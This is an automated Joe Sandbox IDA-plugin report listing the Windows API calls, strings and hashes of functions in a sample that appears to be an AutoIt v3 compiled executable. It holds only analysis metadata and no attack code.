                                                                                                                • Instruction Fuzzy Hash: 6212B370120206DFDF20DF14C884BA6B7E5BF09304F5585A9F999DB292C731ECA5CBA1
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000), ref: 0025A42A
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0025A4E9
                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0025A527
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0025A539
                                                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0025A57F
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0025A58B
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0025A5CF
                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0025A5DE
                                                                                                                • GetStockObject.GDI32(00000011), ref: 0025A5EE
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0025A5F2
                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0025A602
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0025A60B
                                                                                                                • DeleteDC.GDI32(00000000), ref: 0025A614
                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0025A642
                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 0025A659
                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0025A694
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0025A6A8
                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 0025A6B9
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0025A6E9
                                                                                                                • GetStockObject.GDI32(00000011), ref: 0025A6F4
                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0025A6FF
                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0025A709
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                • Opcode ID: b29e318a04cd937554af1fa559ea97e5c05a18aab80af78b854360ff9efdc38d
                                                                                                                • Instruction ID: f95d8f6b9c2ea5d37d638fb345a812f395cbca940dd049ac3d787a345f924b1f
                                                                                                                • Opcode Fuzzy Hash: b29e318a04cd937554af1fa559ea97e5c05a18aab80af78b854360ff9efdc38d
                                                                                                                • Instruction Fuzzy Hash: CCA15DB5A50215BFEB14DBA4EC4AFAE7BB9EB05710F004214FA14A72E1D7B0AD14CF64
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0024E45E
                                                                                                                • GetDriveTypeW.KERNEL32(?,0029DC88,?,\\.\,0029DBF0), ref: 0024E54B
                                                                                                                • SetErrorMode.KERNEL32(00000000,0029DC88,?,\\.\,0029DBF0), ref: 0024E6B1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                • Opcode ID: 9d7b7bb4406a1dbc986360cf6e7a6a7efa3641d8b68bfab6b1626295bdc5013b
                                                                                                                • Instruction ID: 0274abe2da6f755f5df6f2418f0111a3421da091a4a84c3cfd8538b358f8dd42
                                                                                                                • Opcode Fuzzy Hash: 9d7b7bb4406a1dbc986360cf6e7a6a7efa3641d8b68bfab6b1626295bdc5013b
                                                                                                                • Instruction Fuzzy Hash: 60513730278301EBDB08DF14C89186ABB94BB65344F638A1AF456A71D2D7B0DE75DF42
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                • API String ID: 1038674560-86951937
                                                                                                                • Opcode ID: 119ca77505d90cdbc4f7dad480d3abaf3295ae91e890f2e5dfd4478492454428
                                                                                                                • Instruction ID: 65a98d02f18b38ad65db655806a62f6bc8cc4e8a63c9e4f4a995c640569d0f02
                                                                                                                • Opcode Fuzzy Hash: 119ca77505d90cdbc4f7dad480d3abaf3295ae91e890f2e5dfd4478492454428
                                                                                                                • Instruction Fuzzy Hash: 23614BB1270312B7DB25EF609C82FFA72ACAF15340F244121F805A61C3EBA0DA35DA61
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0026C598
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0026C64E
                                                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 0026C669
                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0026C925
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2326795674-4108050209
                                                                                                                • Opcode ID: 988c13460319e8652a2255d3deee23819548f0eb13da5df8d9dfb7d457aa7838
                                                                                                                • Instruction ID: 6c3b6c2b88f10a69a7370c6e73c61df5bba2864975843c40a769afa7d293e662
                                                                                                                • Opcode Fuzzy Hash: 988c13460319e8652a2255d3deee23819548f0eb13da5df8d9dfb7d457aa7838
                                                                                                                • Instruction Fuzzy Hash: 59F10471225342AFE711AF24DC89BB6BBE8FF49354F240619F5D4922A1C774CCA4CB91
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,0029DBF0), ref: 00266245
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                • API String ID: 3964851224-45149045
                                                                                                                • Opcode ID: c5fddeb30229fddc358b70f4bf6d5269c1a33127ba9ddf7af45e44d00b1526df
                                                                                                                • Instruction ID: ddfd6632770963378f8d94603d05403b869a7eb1d4adf6db2b57eaee862df4d5
                                                                                                                • Opcode Fuzzy Hash: c5fddeb30229fddc358b70f4bf6d5269c1a33127ba9ddf7af45e44d00b1526df
                                                                                                                • Instruction Fuzzy Hash: 1EC193742342028BCB14EF14C555AAE77D6AF94390F584869B8925B397CF30DDBACF82
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000012), ref: 0026D3BE
                                                                                                                • SetTextColor.GDI32(?,?), ref: 0026D3C2
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0026D3D8
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0026D3E3
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 0026D3E8
                                                                                                                • GetSysColor.USER32(00000011), ref: 0026D400
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0026D40E
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0026D41F
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0026D428
                                                                                                                • SelectObject.GDI32(?,?), ref: 0026D435
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0026D454
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0026D46B
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0026D480
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0026D4A8
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0026D4CF
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0026D4ED
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 0026D4F8
                                                                                                                • GetSysColor.USER32(00000011), ref: 0026D506
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0026D50E
                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0026D522
                                                                                                                • SelectObject.GDI32(?,0026D0B5), ref: 0026D539
                                                                                                                • DeleteObject.GDI32(?), ref: 0026D544
                                                                                                                • SelectObject.GDI32(?,?), ref: 0026D54A
                                                                                                                • DeleteObject.GDI32(?), ref: 0026D54F
                                                                                                                • SetTextColor.GDI32(?,?), ref: 0026D555
                                                                                                                • SetBkColor.GDI32(?,?), ref: 0026D55F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1996641542-0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0026B5C0
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0026B5D1
                                                                                                                • CharNextW.USER32(0000014E), ref: 0026B600
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0026B641
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0026B657
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0026B668
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0026B685
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0026B6D7
                                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0026B6ED
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0026B71E
                                                                                                                • _memset.LIBCMT ref: 0026B743
                                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0026B78C
                                                                                                                • _memset.LIBCMT ref: 0026B7EB
                                                                                                                • SendMessageW.USER32 ref: 0026B815
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 0026B86D
                                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 0026B91A
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0026B93C
                                                                                                                • GetMenuItemInfoW.USER32(?), ref: 0026B986
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0026B9B3
                                                                                                                • DrawMenuBar.USER32(?), ref: 0026B9C2
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0026B9EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1073566785-4108050209
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00267587
                                                                                                                • GetDesktopWindow.USER32 ref: 0026759C
                                                                                                                • GetWindowRect.USER32(00000000), ref: 002675A3
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00267605
                                                                                                                • DestroyWindow.USER32(?), ref: 00267631
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0026765A
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00267678
                                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0026769E
                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 002676B3
                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002676C6
                                                                                                                • IsWindowVisible.USER32(?), ref: 002676E6
                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00267701
                                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00267715
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0026772D
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00267753
                                                                                                                • GetMonitorInfoW.USER32 ref: 0026776D
                                                                                                                • CopyRect.USER32(?,?), ref: 00267784
                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 002677EF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002476ED
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00247713
                                                                                                                • _wcscpy.LIBCMT ref: 00247741
                                                                                                                • _wcscmp.LIBCMT ref: 0024774C
                                                                                                                • _wcscat.LIBCMT ref: 00247762
                                                                                                                • _wcsstr.LIBCMT ref: 0024776D
                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00247789
                                                                                                                • _wcscat.LIBCMT ref: 002477D2
                                                                                                                • _wcscat.LIBCMT ref: 002477D9
                                                                                                                • _wcsncpy.LIBCMT ref: 00247804
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 699586101-1459072770
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0021A839
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 0021A841
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0021A86C
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 0021A874
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0021A899
                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0021A8B6
                                                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0021A8C6
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0021A8F9
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0021A90D
                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 0021A92B
                                                                                                                • GetStockObject.GDI32(00000011), ref: 0021A947
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0021A952
                                                                                                                  • Part of subcall function 0021B736: GetCursorPos.USER32(000000FF), ref: 0021B749
                                                                                                                  • Part of subcall function 0021B736: ScreenToClient.USER32(00000000,000000FF), ref: 0021B766
                                                                                                                  • Part of subcall function 0021B736: GetAsyncKeyState.USER32(00000001), ref: 0021B78B
                                                                                                                  • Part of subcall function 0021B736: GetAsyncKeyState.USER32(00000002), ref: 0021B799
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,0021ACEE), ref: 0021A979
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00263626
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0029DBF0,00000000,?,00000000,?,?), ref: 00263694
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002636DC
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00263765
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00263A85
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00263A92
                                                                                                                 Memory Dump Source
                                                                                                                 • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                • API String ID: 536824911-966354055
                                                                                                                • Opcode ID: feff6d2cab2a22e515915bea83d2414807b46cb19dea06e0cc7cb70fd34c3168
                                                                                                                • Instruction ID: 71db2c7b5850e45a8ea2206535fc3633800101ced5ce9fddbc24c97bca5d0f97
                                                                                                                • Opcode Fuzzy Hash: feff6d2cab2a22e515915bea83d2414807b46cb19dea06e0cc7cb70fd34c3168
                                                                                                                • Instruction Fuzzy Hash: CE024B75620602AFCB14EF14C895E2AB7E5FF89320F05855DF8899B2A2DB30ED61CF41
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00266A52
                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00266B12
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                • API String ID: 3974292440-719923060
                                                                                                                • Opcode ID: 837cd8433713c3f7d54dd510f137427c8b9e949782b3461ffd050f4b57371d93
                                                                                                                • Instruction ID: e19a4b8c911854718957f6cd4af62d0f53fc163820c3a0e99e519fe8c7a69d74
                                                                                                                • Opcode Fuzzy Hash: 837cd8433713c3f7d54dd510f137427c8b9e949782b3461ffd050f4b57371d93
                                                                                                                • Instruction Fuzzy Hash: 0CA195702347019BCB04EF14C995AAAB3E5EF94354F144929B8A5AB3D3DB70EC65CF41
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0023DD87
                                                                                                                • __swprintf.LIBCMT ref: 0023DE28
                                                                                                                • _wcscmp.LIBCMT ref: 0023DE3B
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0023DE90
                                                                                                                • _wcscmp.LIBCMT ref: 0023DECC
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0023DF03
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0023DF55
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0023DF8B
                                                                                                                • GetParent.USER32(?), ref: 0023DFA9
                                                                                                                • ScreenToClient.USER32(00000000), ref: 0023DFB0
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0023E02A
                                                                                                                • _wcscmp.LIBCMT ref: 0023E03E
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0023E064
                                                                                                                • _wcscmp.LIBCMT ref: 0023E078
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 3119225716-679674701
                                                                                                                • Opcode ID: 9b02c7a5d858b0d974bbb6ae6b48807f9fa2ec318d1296c0358fda44b358e0e6
                                                                                                                • Instruction ID: 11d9b73b158ecb26d161ccebd885c5f81cfdb4286eee2e473c181e9b58ced957
                                                                                                                • Opcode Fuzzy Hash: 9b02c7a5d858b0d974bbb6ae6b48807f9fa2ec318d1296c0358fda44b358e0e6
                                                                                                                • Instruction Fuzzy Hash: BEA1D4B1224317EFDB18DF64D884BAAB7A8FF04310F004519F999D7191EB30E969CB91
                                                                                                                APIs
